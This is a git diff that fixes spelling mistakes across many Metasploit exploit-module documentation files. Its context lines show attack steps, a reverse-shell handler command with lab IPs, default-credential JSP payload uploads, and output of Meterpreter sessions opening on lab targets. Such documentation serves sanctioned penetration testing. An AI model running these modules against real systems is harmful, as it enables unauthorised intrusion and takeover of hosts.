https://github.com/opennetadmin/ona/wiki/Install ## Verification -Launch metasploit and set the appropiate options: +Launch metasploit and set the appropriate options: > > * [ ] Start `msfconsole` > * [ ] `use exploit/unix/webapp/opennetadmin_ping_cmd_injection` diff --git a/documentation/modules/exploit/unix/webapp/xymon_useradm_cmd_exec.md b/documentation/modules/exploit/unix/webapp/xymon_useradm_cmd_exec.md index b57b4051fe6b..158be74834f8 100644 --- a/documentation/modules/exploit/unix/webapp/xymon_useradm_cmd_exec.md +++ b/documentation/modules/exploit/unix/webapp/xymon_useradm_cmd_exec.md @@ -30,7 +30,7 @@ * https://sourceforge.net/projects/xymon/files/Xymon/4.3.10/VM/ - To enable authentication via the web interace, add a user to `/etc/xymon/xymonpasswd` : + To enable authentication via the web interface, add a user to `/etc/xymon/xymonpasswd` : ``` htpasswd /etc/xymon/xymonpasswd diff --git a/documentation/modules/exploit/unix/webapp/zoneminder_lang_exec.md b/documentation/modules/exploit/unix/webapp/zoneminder_lang_exec.md index 5b22eb5db308..e9012c9b1ec5 100644 --- a/documentation/modules/exploit/unix/webapp/zoneminder_lang_exec.md +++ b/documentation/modules/exploit/unix/webapp/zoneminder_lang_exec.md @@ -110,7 +110,7 @@ id uid=33(www-data) gid=33(www-data) groups=33(www-data) ``` -### Failed exploitation due to invaild credentials +### Failed exploitation due to invalid credentials ``` msf6 > use exploit/unix/webapp/zoneminder_lang_exec diff --git a/documentation/modules/exploit/windows/backupexec/ssl_uaf.md b/documentation/modules/exploit/windows/backupexec/ssl_uaf.md index 37b72d996405..969c4344f047 100644 --- a/documentation/modules/exploit/windows/backupexec/ssl_uaf.md +++ b/documentation/modules/exploit/windows/backupexec/ssl_uaf.md @@ -198,4 +198,4 @@ While the exploit is not guaranteed to gain RCE (see the module's description), in practise the agent is often widely installed in a Windows domain across a range of hosts (including fileservers and domain controllers). This means usually at least one instance of the agent will give a shell on a server where -it's easy enough to further escalate to Domain Administator from `SYSTEM`. +it's easy enough to further escalate to Domain Administrator from `SYSTEM`. diff --git a/documentation/modules/exploit/windows/browser/ms14_064_ole_code_execution.md b/documentation/modules/exploit/windows/browser/ms14_064_ole_code_execution.md index 37cef2178919..23c817909fbc 100644 --- a/documentation/modules/exploit/windows/browser/ms14_064_ole_code_execution.md +++ b/documentation/modules/exploit/windows/browser/ms14_064_ole_code_execution.md @@ -60,7 +60,7 @@ Meterpreter : x86/windows ### Windows 7 Pro SP1 x64 with IE 8.0.7601.17514 -The attacker's IP is `192.168.2.3` and the victim's IP is `192.168.2.208`. Unlike on the Windows XP, target victim will see a popup dialog apear and they will have to allow the execution of the PowerShell script for the exploit to work. You need to set `AllowPowershellPrompt` option to `true` otherwise the exploit won't work on Windows 7. +The attacker's IP is `192.168.2.3` and the victim's IP is `192.168.2.208`. Unlike on the Windows XP, target victim will see a popup dialog appear and they will have to allow the execution of the PowerShell script for the exploit to work. You need to set `AllowPowershellPrompt` option to `true` otherwise the exploit won't work on Windows 7. ``` msf > use exploit/windows/browser/ms14_064_ole_code_execution diff --git a/documentation/modules/exploit/windows/fileformat/foxit_reader_uaf.md b/documentation/modules/exploit/windows/fileformat/foxit_reader_uaf.md index 37f833451181..b05b8e858167 100644 --- a/documentation/modules/exploit/windows/fileformat/foxit_reader_uaf.md +++ b/documentation/modules/exploit/windows/fileformat/foxit_reader_uaf.md @@ -1,6 +1,6 @@ ## Description -Foxit Reader v9.0.1.1049 and earlier are affected by use-after-free and uninitialzed memory vulnerabilities that can be used to gain code execution. This module uses Uint32Array uninitialized memory and text annotation use-after-free vulnerabilities to call WinExec with a share file path to download and execute the specified exe. The module has been tested against Foxit Reader v9.0.1.1049 running on Windows 7 x64 and Windows 10 Pro x64 Build 17134. Windows 10 Enterprise needs to have [insecure logons enabled](https://support.microsoft.com/en-ca/help/4046019) for the exploit to work as expected. +Foxit Reader v9.0.1.1049 and earlier are affected by use-after-free and uninitialized memory vulnerabilities that can be used to gain code execution. This module uses Uint32Array uninitialized memory and text annotation use-after-free vulnerabilities to call WinExec with a share file path to download and execute the specified exe. The module has been tested against Foxit Reader v9.0.1.1049 running on Windows 7 x64 and Windows 10 Pro x64 Build 17134. Windows 10 Enterprise needs to have [insecure logons enabled](https://support.microsoft.com/en-ca/help/4046019) for the exploit to work as expected. ## Vulnerable Application diff --git a/documentation/modules/exploit/windows/fileformat/office_ms17_11882.md b/documentation/modules/exploit/windows/fileformat/office_ms17_11882.md index bb69f053a0b1..4b72a903ff4a 100644 --- a/documentation/modules/exploit/windows/fileformat/office_ms17_11882.md +++ b/documentation/modules/exploit/windows/fileformat/office_ms17_11882.md @@ -40,7 +40,7 @@ msf exploit(office_ms17_11882) > run [*] Local IP: http://192.1668.0.11:8080/BUY0DYgc [*] Server started. [*] 192.168.0.24 office_ms17_11882 - Handling initial request from 192.168.0.24 -[*] 192.168.0.24 office_ms17_11882 - Stage two requestd, sending +[*] 192.168.0.24 office_ms17_11882 - Stage two requested, sending [*] Sending stage (205379 bytes) to 192.168.0.24 [*] Meterpreter session 1 opened (192.168.0.11:35116 -> 192.168.0.24:52217) at 2017-11-21 14:41:59 -0500 sessions -i 1 diff --git a/documentation/modules/exploit/windows/fileformat/vlc_mkv.md b/documentation/modules/exploit/windows/fileformat/vlc_mkv.md index 25e306b25e26..97a58d1d7f97 100644 --- a/documentation/modules/exploit/windows/fileformat/vlc_mkv.md +++ b/documentation/modules/exploit/windows/fileformat/vlc_mkv.md @@ -32,7 +32,7 @@ msf5 exploit(windows/fileformat/vlc_mkv) > run [+] tjub-part2.mkv stored at /home/msfdev/.msf4/local/tjub-part2.mkv [*] Created tjub-part2.mkv. Put this file in the same directory as tjub-part1.mkv [*] Appending blocks to tjub-part1.mkv -[+] Succesfully appended blocks to tjub-part1.mkv +[+] Successfully appended blocks to tjub-part1.mkv msf5 exploit(windows/fileformat/vlc_mkv) > handler -p windows/x64/shell/reverse_tcp -H 172.22.222.134 -P 4444 [*] Payload handler running as background job 0. msf5 exploit(windows/fileformat/vlc_mkv) > diff --git a/documentation/modules/exploit/windows/fileformat/word_mshtml_rce.md b/documentation/modules/exploit/windows/fileformat/word_mshtml_rce.md index 5ccd0d54efb2..91fd70cffa68 100644 --- a/documentation/modules/exploit/windows/fileformat/word_mshtml_rce.md +++ b/documentation/modules/exploit/windows/fileformat/word_mshtml_rce.md @@ -111,13 +111,13 @@ A DOCX file that will be used as a template to build the exploit. You need to create new office document and personalizing it by your own model (CV, Report, ...). - The easy way, copy and paste (keep formating) from `data/exploits/cve-2021-40444.docx`. + The easy way, copy and paste (keep formatting) from `data/exploits/cve-2021-40444.docx`. You can copy this anywhere in the document. Save the document and unpack this. - Check that `word/documment.xml` contains something like: + Check that `word/document.xml` contains something like: ``` <w:object w:dxaOrig="4320" w:dyaOrig="4320"> diff --git a/documentation/modules/exploit/windows/ftp/ftpshell_cli_bof.md b/documentation/modules/exploit/windows/ftp/ftpshell_cli_bof.md index c58b8b6feddd..f6b7fdbc4786 100644 --- a/documentation/modules/exploit/windows/ftp/ftpshell_cli_bof.md +++ b/documentation/modules/exploit/windows/ftp/ftpshell_cli_bof.md @@ -9,7 +9,7 @@ FTPShell client 6.70 (Enterprise edition) is affected by a stack-based buffer ov 4. Do `set PAYLOAD windows/meterpreter/reverse_tcp` 5. Do `set LHOST ip` 6. Do `exploit` - 7. Conect to the FTP server using FTPShell client 6.70 + 7. Connect to the FTP server using FTPShell client 6.70 8. Verify the Meterpreter session is opened ## Scenarios diff --git a/documentation/modules/exploit/windows/http/apache_activemq_traversal_upload.md b/documentation/modules/exploit/windows/http/apache_activemq_traversal_upload.md index cd29136b9237..6d2f2a000cbd 100644 --- a/documentation/modules/exploit/windows/http/apache_activemq_traversal_upload.md +++ b/documentation/modules/exploit/windows/http/apache_activemq_traversal_upload.md @@ -4,7 +4,7 @@ A directory traversal vulnerability was discovered in the fileserver upload/down Because vulnerable servers allow for directory traversal, they will accept HTTP PUT requests for `/fileserver/..\\admin\\` and process these as requests for `/admin/`. For the PUT request to succeed, credentials need to be provided. -This module exploits CVE-2015-1830 by attempting to upload a JSP payload to a target via an HTTP PUT requests for `/fileserver/..\\admin\\` using the default credentials `admin:admin` (or any other credentials provided by the user). It then issues an HTTP GET request to `/admin/.jsp` on the target in order to trigger the payload and obtain a shell. The module has been succesfully tested against ActiveMQ 5.11.1 on a Windows 7 machine. +This module exploits CVE-2015-1830 by attempting to upload a JSP payload to a target via an HTTP PUT requests for `/fileserver/..\\admin\\` using the default credentials `admin:admin` (or any other credentials provided by the user). It then issues an HTTP GET request to `/admin/.jsp` on the target in order to trigger the payload and obtain a shell. The module has been successfully tested against ActiveMQ 5.11.1 on a Windows 7 machine. ## Verification Steps diff --git a/documentation/modules/exploit/windows/http/dnn_cookie_deserialization_rce.md b/documentation/modules/exploit/windows/http/dnn_cookie_deserialization_rce.md index 9a629e93cbc2..92834909a9b2 100644 --- a/documentation/modules/exploit/windows/http/dnn_cookie_deserialization_rce.md +++ b/documentation/modules/exploit/windows/http/dnn_cookie_deserialization_rce.md @@ -42,7 +42,7 @@ The expected structure includes a "type" attribute to instruct the server which Log in as the super user account and make sure the 404 error page is set to the built-in 404 Error Page. Typically, this is already set as the default setting, but during testing I encountered an edge case where an issue during installation caused this value to be set to "None Specified". - Additionally, if you are testing this module from a machine other than the host that the application is installed on, you will need to configure the Site Alias so that it is accessible using a hostname other than `localhost`. Additional firewall rules may need to be configured to allow web access, depending on how you set up the applicaiton in IIS. + Additionally, if you are testing this module from a machine other than the host that the application is installed on, you will need to configure the Site Alias so that it is accessible using a hostname other than `localhost`. Additional firewall rules may need to be configured to allow web access, depending on how you set up the application in IIS. This module has been tested on DNN v7.0.0 - v9.3.0-RC running on Windows Server 2016. @@ -116,7 +116,7 @@ The expected structure includes a "type" attribute to instruct the server which 22. **Verify** that you get a Meterpreter shell ### v9.2.2 - 9.3.0-RC - In these versions, the `userId` value was changed to be a randomly generated GUID. This means that only the first part of the verification plaintext is known. By providing a list of several verification codes, it is possible to reduce the nubmer of potential encryption key values to a feasible amount. Once the list of encryption keys has been reduced, the module will test each key until an HTTP callback is received on port `8080` that indicates which key worked. Then, the final exploit payload will be encrypted using the recovered key and sent to the server, resulting in a shell. + In these versions, the `userId` value was changed to be a randomly generated GUID. This means that only the first part of the verification plaintext is known. By providing a list of several verification codes, it is possible to reduce the number of potential encryption key values to a feasible amount. Once the list of encryption keys has been reduced, the module will test each key until an HTTP callback is received on port `8080` that indicates which key worked. Then, the final exploit payload will be encrypted using the recovered key and sent to the server, resulting in a shell. 1. Install the application 2. Configure the application to use Verified Registration @@ -284,7 +284,7 @@ The expected structure includes a "type" attribute to instruct the server which [*] Trying to determine DNN Version... [*] Checking version at /Documentation/License.txt ... - [!] DNN Version Found: v9.2.0+ - Requires ENCRYPTED and SESSION_TOKEN. Setting target to 3 (v9.2.0 - v9.2.1). Site may also be 9.2.2 - try setting target 4 and supply a file of of verification codes, or specifiy valid Key and IV values. + [!] DNN Version Found: v9.2.0+ - Requires ENCRYPTED and SESSION_TOKEN. Setting target to 3 (v9.2.0 - v9.2.1). Site may also be 9.2.2 - try setting target 4 and supply a file of verification codes, or specify valid Key and IV values. [*] Checking for custom error page at: /__ ... [+] Custom error page detected. [+] 192.168.31.131:8085 - The target appears to be vulnerable. diff --git a/documentation/modules/exploit/windows/http/exchange_proxyshell_rce.md b/documentation/modules/exploit/windows/http/exchange_proxyshell_rce.md index 4ed817e7f438..b4f49686a9ed 100644 --- a/documentation/modules/exploit/windows/http/exchange_proxyshell_rce.md +++ b/documentation/modules/exploit/windows/http/exchange_proxyshell_rce.md @@ -23,7 +23,7 @@ At a high level, the steps the exploit takes are as follows: 1. Build a Common Access Token corresponding to a user with the "Mailbox Import Export" role 1. If an email address is specified using the `EMAIL` datastore option, the exploit will attempt to use the owner 1. If no email address is specified - 1. The exploit will leverage the SSRF to issue a reques to EWS and enumerate the email addresses + 1. The exploit will leverage the SSRF to issue a request to EWS and enumerate the email addresses * This technique was taken from [dmassland/proxyshell-poc](https://github.com/dmaasland/proxyshell-poc/blob/main/proxyshell-enumerate.py) 1. The module will store the enumerated email addresses in a CSV file 1. Each of the email addresses will be checked for the necessary role diff --git a/documentation/modules/exploit/windows/http/lg_simple_editor_rce.md b/documentation/modules/exploit/windows/http/lg_simple_editor_rce.md index 682d009d1101..c56cbc78482c 100644 --- a/documentation/modules/exploit/windows/http/lg_simple_editor_rce.md +++ b/documentation/modules/exploit/windows/http/lg_simple_editor_rce.md @@ -43,7 +43,7 @@ msf6 exploit(windows/http/lg_simple_editor_rce) > run [+] The target appears to be vulnerable. Version: 3.21.0 [*] Uploading JSP payload... [+] Payload uploaded successfully -[+] /nvFIE_original.bmp -> /nvFIE.jsp copy successfull. +[+] /nvFIE_original.bmp -> /nvFIE.jsp copy successful. [*] Triggering payload... [*] Sending stage (175686 bytes) to 192.168.56.109 [+] Deleted ./webapps/simpleeditor/nvFIE.jsp diff --git a/documentation/modules/exploit/windows/http/manageengine_adselfservice_plus_cve_2022_28810.md b/documentation/modules/exploit/windows/http/manageengine_adselfservice_plus_cve_2022_28810.md index a4922eae0d7c..d43fd51feb10 100644 --- a/documentation/modules/exploit/windows/http/manageengine_adselfservice_plus_cve_2022_28810.md +++ b/documentation/modules/exploit/windows/http/manageengine_adselfservice_plus_cve_2022_28810.md @@ -29,7 +29,7 @@ you'll need that. 1. Prepare a Windows environment to install on. 1. Download [ManageEngine_ADSelfService_Plus_64bit.exe] build 6121 -1. Run the installer (skip registeration). Do **not** "Start ADSelfService Plus in console mode". +1. Run the installer (skip registration). Do **not** "Start ADSelfService Plus in console mode". 1. Run the service installer (start menu -> "Install ADSelfService Plus as Service") 1. Start the service (services -> "ManageEngine ADSelfService Plus") 1. Nagivate to the web server: http://localhost:8888 (may take a few minutes to load) diff --git a/documentation/modules/exploit/windows/http/manageengine_appmanager_exec.md b/documentation/modules/exploit/windows/http/manageengine_appmanager_exec.md index 45e755ca70bd..c8af3b319be4 100644 --- a/documentation/modules/exploit/windows/http/manageengine_appmanager_exec.md +++ b/documentation/modules/exploit/windows/http/manageengine_appmanager_exec.md @@ -39,7 +39,7 @@ msf5 exploit(windows/http/manageengine_appmanager_exec) > check msf5 exploit(windows/http/manageengine_appmanager_exec) > run [*] Started reverse TCP handler on 12.0.0.1:4444 -[*] Trigerring the vulnerability +[*] Triggering the vulnerability [*] Sending stage (179779 bytes) to 12.0.0.192 meterpreter > getuid diff --git a/documentation/modules/exploit/windows/http/oats_weblogic_console.md b/documentation/modules/exploit/windows/http/oats_weblogic_console.md index 44fa6efa4766..38cdce0a6b0d 100644 --- a/documentation/modules/exploit/windows/http/oats_weblogic_console.md +++ b/documentation/modules/exploit/windows/http/oats_weblogic_console.md @@ -4,7 +4,7 @@ Oracle Application Testing Suite (OATS) is a comprehensive, integrated testing s applications, and Oracle databases. OATS is part of an application deployed in the WebLogic service on port 8088, which also includes these tools: Administrator, OpenScript, Oracle Load Testing, and Oracle Test Manager. -In the administrator console, the deployement feature can be abused to upload an arbitrary WAR file, allowing remote code execution under the +In the administrator console, the deployment feature can be abused to upload an arbitrary WAR file, allowing remote code execution under the context of SYSTEM. Authentication is required. The following is the exact setup I used to test and analyze the vulnerability: diff --git a/documentation/modules/exploit/windows/http/sitecore_xp_cve_2021_42237.md b/documentation/modules/exploit/windows/http/sitecore_xp_cve_2021_42237.md index d4fd6eb81f8f..34224c40aa69 100644 --- a/documentation/modules/exploit/windows/http/sitecore_xp_cve_2021_42237.md +++ b/documentation/modules/exploit/windows/http/sitecore_xp_cve_2021_42237.md @@ -4,7 +4,7 @@ of Sitecore XP 7.5 to 7.5.2, 8.0 to 8.0.7, 8.1 to 8.1.3, and 8.2 to 8.2.7. Versions 7.2.6 and earlier and 9.0 and later are not affected. The vulnerability occurs due to `Report.ashx`'s handler, located in `Sitecore.Xdb.Client.dll` -under the `Sitecore.sitecore.shell.ClientBin.Reporting.Report` defintion, having a `ProcessRequest()` +under the `Sitecore.sitecore.shell.ClientBin.Reporting.Report` definition, having a `ProcessRequest()` handler that calls `ProcessReport()` with the context of the attacker's request without properly checking if the attacker is authenticated or not. diff --git a/documentation/modules/exploit/windows/http/trendmicro_officescan_widget_exec.md b/documentation/modules/exploit/windows/http/trendmicro_officescan_widget_exec.md index 2cf1fc638abf..21524b1c43e9 100644 --- a/documentation/modules/exploit/windows/http/trendmicro_officescan_widget_exec.md +++ b/documentation/modules/exploit/windows/http/trendmicro_officescan_widget_exec.md @@ -43,7 +43,7 @@ msf exploit(trendmicro_officescan_widget_exec) > exploit [*] Exploiting authentication bypass [+] Authenticated successfully bypassed. [*] Generating payload -[*] Trigerring command injection vulnerability +[*] Triggering command injection vulnerability [*] Sending stage (179267 bytes) to 12.0.0.176 [*] Meterpreter session 9 opened (12.0.0.1:4444 -> 12.0.0.176:49842) at 2017-10-09 21:57:29 +0300 diff --git a/documentation/modules/exploit/windows/local/cve_2020_0668_service_tracing.md b/documentation/modules/exploit/windows/local/cve_2020_0668_service_tracing.md index 87110018100b..751dba8bab10 100644 --- a/documentation/modules/exploit/windows/local/cve_2020_0668_service_tracing.md +++ b/documentation/modules/exploit/windows/local/cve_2020_0668_service_tracing.md @@ -172,7 +172,7 @@ msf5 exploit(windows/local/cve_2020_0668_service_tracing) > run [*] Making C:\Users\msfuser\AppData\Local\Temp\jeYpOx on DESKTOP-D1E425Q [*] Creating C:\Users\msfuser\AppData\Local\Temp\jeYpOx [*] Creating mountpoint -[+] Successfuly opened C:\Users\msfuser\AppData\Local\Temp\jeYpOx +[+] Successfully opened C:\Users\msfuser\AppData\Local\Temp\jeYpOx [*] Uploading payload to C:\Users\msfuser\AppData\Local\Temp\FICNArio.dll [*] Payload md5 = b8341507939ea464f81f0245628e470f [*] Creating Symlinks diff --git a/documentation/modules/exploit/windows/local/cve_2020_1048_printerdemon.md b/documentation/modules/exploit/windows/local/cve_2020_1048_printerdemon.md index 397b0dd9853b..5f3c0a8b3812 100644 --- a/documentation/modules/exploit/windows/local/cve_2020_1048_printerdemon.md +++ b/documentation/modules/exploit/windows/local/cve_2020_1048_printerdemon.md @@ -16,7 +16,7 @@ location when it restarts, then it will load the DLL into itself when it restarts a second time. The DLL will then be running as ```SYSTEM```. When the printer is created, the target will show a pop-up saying a -printer weas created. +printer was created. A larger issue here is that the Spooler service does not like to stop. Trying `sc stop` Spooler does not stop the spooler. Killing the pid with a trusted process will kill it, but it restarts diff --git a/documentation/modules/exploit/windows/local/cve_2020_1337_printerdemon.md b/documentation/modules/exploit/windows/local/cve_2020_1337_printerdemon.md index 72db8a91449e..fb5d82958ce0 100644 --- a/documentation/modules/exploit/windows/local/cve_2020_1337_printerdemon.md +++ b/documentation/modules/exploit/windows/local/cve_2020_1337_printerdemon.md @@ -60,7 +60,7 @@ Verify you get a session ```C:\windows\system32\``` **JUNCTION_PATH** - Path to use as a juntion point. It should be nonexistant/empty. Default is + Path to use as a juntion point. It should be nonexistent/empty. Default is ```%TEMP%/%RAND%``` **PRINTER_NAME** diff --git a/documentation/modules/exploit/windows/local/cve_2022_26904_superprofile.md b/documentation/modules/exploit/windows/local/cve_2022_26904_superprofile.md index 02c97c123374..683b63d10615 100644 --- a/documentation/modules/exploit/windows/local/cve_2022_26904_superprofile.md +++ b/documentation/modules/exploit/windows/local/cve_2022_26904_superprofile.md @@ -54,7 +54,7 @@ This module has been successfully tested on Windows 11. ### LOGINUSER The username of a valid user who has logged into the target system before and has a profile under `C:\Users` with their username in -`C:\Users\.\` format if targetting a domain user or `C:\Users\\` if targetting a local user account. This user +`C:\Users\.\` format if targeting a domain user or `C:\Users\\` if targeting a local user account. This user must not be an administrator or any account that would run with High integrity to ensure the UAC prompt appears as expected, and should ideally be another normal user account that has permissions to log into the target computer. diff --git a/documentation/modules/exploit/windows/local/lexmark_driver_privesc.md b/documentation/modules/exploit/windows/local/lexmark_driver_privesc.md index 3b713dfb1c88..e38b57701cd1 100644 --- a/documentation/modules/exploit/windows/local/lexmark_driver_privesc.md +++ b/documentation/modules/exploit/windows/local/lexmark_driver_privesc.md @@ -1,7 +1,7 @@ ## Vulnerable Application Various Lexmark Universal Printer drivers as listed at [advisory TE953](http://support.lexmark.com/index?page=content&id=TE953) -allow low-privileged authenicated users to elevate their privileges to `SYSTEM` on affected Windows systems by modifying +allow low-privileged authenticated users to elevate their privileges to `SYSTEM` on affected Windows systems by modifying the XML file at `C:\\ProgramData\\\\Universal Color Laser.gdl` to replace the DLL path to `unires.dll` with a malicious DLL path. diff --git a/documentation/modules/exploit/windows/local/ms16_075_reflection.md b/documentation/modules/exploit/windows/local/ms16_075_reflection.md index 2519c8eac8e6..87da5702f29b 100644 --- a/documentation/modules/exploit/windows/local/ms16_075_reflection.md +++ b/documentation/modules/exploit/windows/local/ms16_075_reflection.md @@ -8,7 +8,7 @@ attack at which intercepts the hash and relay responses from RPC to be able to establish a handle to a new SYSTEM token. Some caveats : Set your target option to match the architecture of your Meterpreter session, else it will inject the wrong architecture DLL into the process -of a seperate architecture. Additionally, after you have established a +of a separate architecture. Additionally, after you have established a session, you must use incognito to imperonsate the SYSTEM Token. ## Build Instructions diff --git a/documentation/modules/exploit/windows/local/ms16_reflection.md b/documentation/modules/exploit/windows/local/ms16_reflection.md index f813dab816e6..3484133973a5 100644 --- a/documentation/modules/exploit/windows/local/ms16_reflection.md +++ b/documentation/modules/exploit/windows/local/ms16_reflection.md @@ -8,7 +8,7 @@ attack at which intercepts the hash and relay responses from RPC to be able to establish a handle to a new SYSTEM token. Some caveats : Set your target option to match the architecture of your Meterpreter session, else it will inject the wrong architecture DLL into the process -of a seperate architecture. Additionally, after you have established a +of a separate architecture. Additionally, after you have established a session, you must use incognito to imperonsate the SYSTEM Token. ## Usage diff --git a/documentation/modules/exploit/windows/local/tokenmagic.md b/documentation/modules/exploit/windows/local/tokenmagic.md index 4d617b30f8bd..9ea7554935ce 100644 --- a/documentation/modules/exploit/windows/local/tokenmagic.md +++ b/documentation/modules/exploit/windows/local/tokenmagic.md @@ -7,7 +7,7 @@ integrity level, use it to create a new restricted token, impersonate it and use the Secondary Logon service to spawn a new process with High IL. Like playing hide-and-go-seek with tokens -The module exploits the high IL gained from the "token magic" by either starting a malicious service or by preforming a DLL hijack +The module exploits the high IL gained from the "token magic" by either starting a malicious service or by performing a DLL hijack on a known DLL in `system32`. ### Installation And Setup diff --git a/documentation/modules/exploit/windows/local/windscribe_windscribeservice_priv_esc.md b/documentation/modules/exploit/windows/local/windscribe_windscribeservice_priv_esc.md index ad7748dd4ceb..32e6461efac1 100644 --- a/documentation/modules/exploit/windows/local/windscribe_windscribeservice_priv_esc.md +++ b/documentation/modules/exploit/windows/local/windscribe_windscribeservice_priv_esc.md @@ -61,7 +61,7 @@ [*] Started reverse TCP handler on 172.16.191.165:4444 [*] Writing payload (283 bytes) to C:\Users\test\AppData\Local\Temp\1OOIoYHTpb.exe ... [*] Sending C:\Users\test\AppData\Local\Temp\1OOIoYHTpb.exe to \\.\pipe\WindscribeService ... - [+] Opended \\.\pipe\WindscribeService! Proceeding ... + [+] Opened \\.\pipe\WindscribeService! Proceeding ... [*] Sending stage (180291 bytes) to 172.16.191.242 [*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.242:49365) at 2020-01-31 19:14:31 -0500 [-] Failed to delete C:\Users\test\AppData\Local\Temp\1OOIoYHTpb.exe: stdapi_fs_delete_file: Operation failed: Access is denied. diff --git a/documentation/modules/exploit/windows/misc/ahsay_backup_fileupload.md b/documentation/modules/exploit/windows/misc/ahsay_backup_fileupload.md index f71f8ee504c1..3ad96a55b192 100644 --- a/documentation/modules/exploit/windows/misc/ahsay_backup_fileupload.md +++ b/documentation/modules/exploit/windows/misc/ahsay_backup_fileupload.md @@ -41,9 +41,9 @@ msf exploit(windows/misc/ahsay_fileupload) > run [+] Username and password are valid! [+] No need to create account, already exists! [*] Uploading payload -[+] Succesfully uploaded ../../webapps/cbs/help/en/lcofxnrzON.exe +[+] Successfully uploaded ../../webapps/cbs/help/en/lcofxnrzON.exe [*] Uploading payload -[+] Succesfully uploaded ../../webapps/cbs/help/en/myjnJMFlNi.jsp +[+] Successfully uploaded ../../webapps/cbs/help/en/myjnJMFlNi.jsp [*] Triggering exploit! https://172.16.238.175:443/cbs/help/en/myjnJMFlNi.jsp [+] Exploit executed! [*] Sending stage (179779 bytes) to 172.16.238.175 diff --git a/documentation/modules/exploit/windows/misc/ais_esel_server_rce.md b/documentation/modules/exploit/windows/misc/ais_esel_server_rce.md index fcd6c9c1773f..b2531707591b 100644 --- a/documentation/modules/exploit/windows/misc/ais_esel_server_rce.md +++ b/documentation/modules/exploit/windows/misc/ais_esel_server_rce.md @@ -48,15 +48,15 @@ msf5 exploit(windows/misc/ais_esel_server_rce) > run [*] Started reverse TCP handler on 10.66.75.208:4444 - [+] 10.66.75.212:5099 - Correct response received => Data send succesfully - [+] 10.66.75.212:5099 - Correct response received => Data send succesfully + [+] 10.66.75.212:5099 - Correct response received => Data send successfully + [+] 10.66.75.212:5099 - Correct response received => Data send successfully [*] 10.66.75.212:5099 - Command Stager progress - 1.47% done (1499/102292 bytes) - [+] 10.66.75.212:5099 - Correct response received => Data send succesfully + [+] 10.66.75.212:5099 - Correct response received => Data send successfully [*] 10.66.75.212:5099 - Command Stager progress - 2.93% done (2998/102292 bytes) - [+] 10.66.75.212:5099 - Correct response received => Data send succesfully + [+] 10.66.75.212:5099 - Correct response received => Data send successfully ... [*] 10.66.75.212:5099 - Command Stager progress - 99.55% done (101827/102292 bytes) - [+] 10.66.75.212:5099 - Correct response received => Data send succesfully + [+] 10.66.75.212:5099 - Correct response received => Data send successfully [*] Sending stage (179779 bytes) to 10.66.75.212 [*] 10.66.75.212:5099 - Command Stager progress - 100.00% done (102292/102292 bytes) [!] 10.66.75.212:5099 - The payload is left on the client in the %TEMP% Folder of the corresponding user. diff --git a/documentation/modules/exploit/windows/misc/cloudme_sync.md b/documentation/modules/exploit/windows/misc/cloudme_sync.md index 75fcf7c8618c..eb1dd285f084 100644 --- a/documentation/modules/exploit/windows/misc/cloudme_sync.md +++ b/documentation/modules/exploit/windows/misc/cloudme_sync.md @@ -15,7 +15,7 @@ Because neither functions check the max size against the actual amount of space ## Verification Steps 1. Install CloudMe for Desktop version `v1.10.9` - 2. Start the applicaton (you don't need to create an account) + 2. Start the application (you don't need to create an account) 3. Start `msfconsole` 4. Do `use exploit/windows/misc/cloudme_sync` 5. Do `set RHOST ip` diff --git a/documentation/modules/exploit/windows/misc/hp_imc_dbman_restartdb_unauth_rce.md b/documentation/modules/exploit/windows/misc/hp_imc_dbman_restartdb_unauth_rce.md index 0d1848d26bf9..d8c62b5be97b 100644 --- a/documentation/modules/exploit/windows/misc/hp_imc_dbman_restartdb_unauth_rce.md +++ b/documentation/modules/exploit/windows/misc/hp_imc_dbman_restartdb_unauth_rce.md @@ -1,6 +1,6 @@ ## Description - This module exploits a remote command execution vulnerablity in Hewlett Packard Enterprise Intelligent Management Center before version 7.3 E0504P04. + This module exploits a remote command execution vulnerability in Hewlett Packard Enterprise Intelligent Management Center before version 7.3 E0504P04. The dbman service allows unauthenticated remote users to restart a user-specified database instance (OpCode 10008), however the instance ID is not sanitized, allowing execution of arbitrary operating system commands as SYSTEM. This service listens on TCP port 2810 by default. diff --git a/documentation/modules/exploit/windows/misc/hp_imc_dbman_restoredbase_unauth_rce.md b/documentation/modules/exploit/windows/misc/hp_imc_dbman_restoredbase_unauth_rce.md index ec60fe489258..ec8f7497aa3c 100644 --- a/documentation/modules/exploit/windows/misc/hp_imc_dbman_restoredbase_unauth_rce.md +++ b/documentation/modules/exploit/windows/misc/hp_imc_dbman_restoredbase_unauth_rce.md @@ -1,6 +1,6 @@ ## Description - This module exploits a remote command execution vulnerablity in Hewlett Packard Enterprise Intelligent Management Center before version 7.3 E0504P04. + This module exploits a remote command execution vulnerability in Hewlett Packard Enterprise Intelligent Management Center before version 7.3 E0504P04. The dbman service allows unauthenticated remote users to restore a user-specified database (OpCode 10007), however the database connection username is not sanitized resulting in command injection, allowing execution of arbitrary operating system commands as SYSTEM. This service listens on TCP port 2810 by default. diff --git a/documentation/modules/exploit/windows/misc/hp_loadrunner_magentproc_cmdexec.md b/documentation/modules/exploit/windows/misc/hp_loadrunner_magentproc_cmdexec.md index 2d5b5f78f827..48807983dc61 100644 --- a/documentation/modules/exploit/windows/misc/hp_loadrunner_magentproc_cmdexec.md +++ b/documentation/modules/exploit/windows/misc/hp_loadrunner_magentproc_cmdexec.md @@ -2,7 +2,7 @@ HP Mercury LoadRunner Agent magentproc.exe Remote Command Execution (CVE-2010-1549) -This module exploits a remote command execution vulnerablity in HP LoadRunner before 9.50 and also +This module exploits a remote command execution vulnerability in HP LoadRunner before 9.50 and also HP Performance Center before 9.50. By sending a specially crafted packet, an attacker can execute commands remotely. The service is vulnerable provided the Secure Channel feature is disabled (default). diff --git a/documentation/modules/exploit/windows/tftp/distinct_tftp_traversal.md b/documentation/modules/exploit/windows/tftp/distinct_tftp_traversal.md index ab2b90f51a12..bb1f5f79771e 100644 --- a/documentation/modules/exploit/windows/tftp/distinct_tftp_traversal.md +++ b/documentation/modules/exploit/windows/tftp/distinct_tftp_traversal.md @@ -20,7 +20,7 @@ 3. Select `Configure` -> `TFTP` from the application menu 4. Set the root directory to `C:\\some\\path` 5. Check `Enable TFTP Server` - 6. Pres `OK` to apply settings + 6. Press `OK` to apply settings Exploitation: diff --git a/documentation/modules/payload/windows/meterpreter/reverse_https.md b/documentation/modules/payload/windows/meterpreter/reverse_https.md index 55f2d9eb1945..0a9c1e33192c 100644 --- a/documentation/modules/payload/windows/meterpreter/reverse_https.md +++ 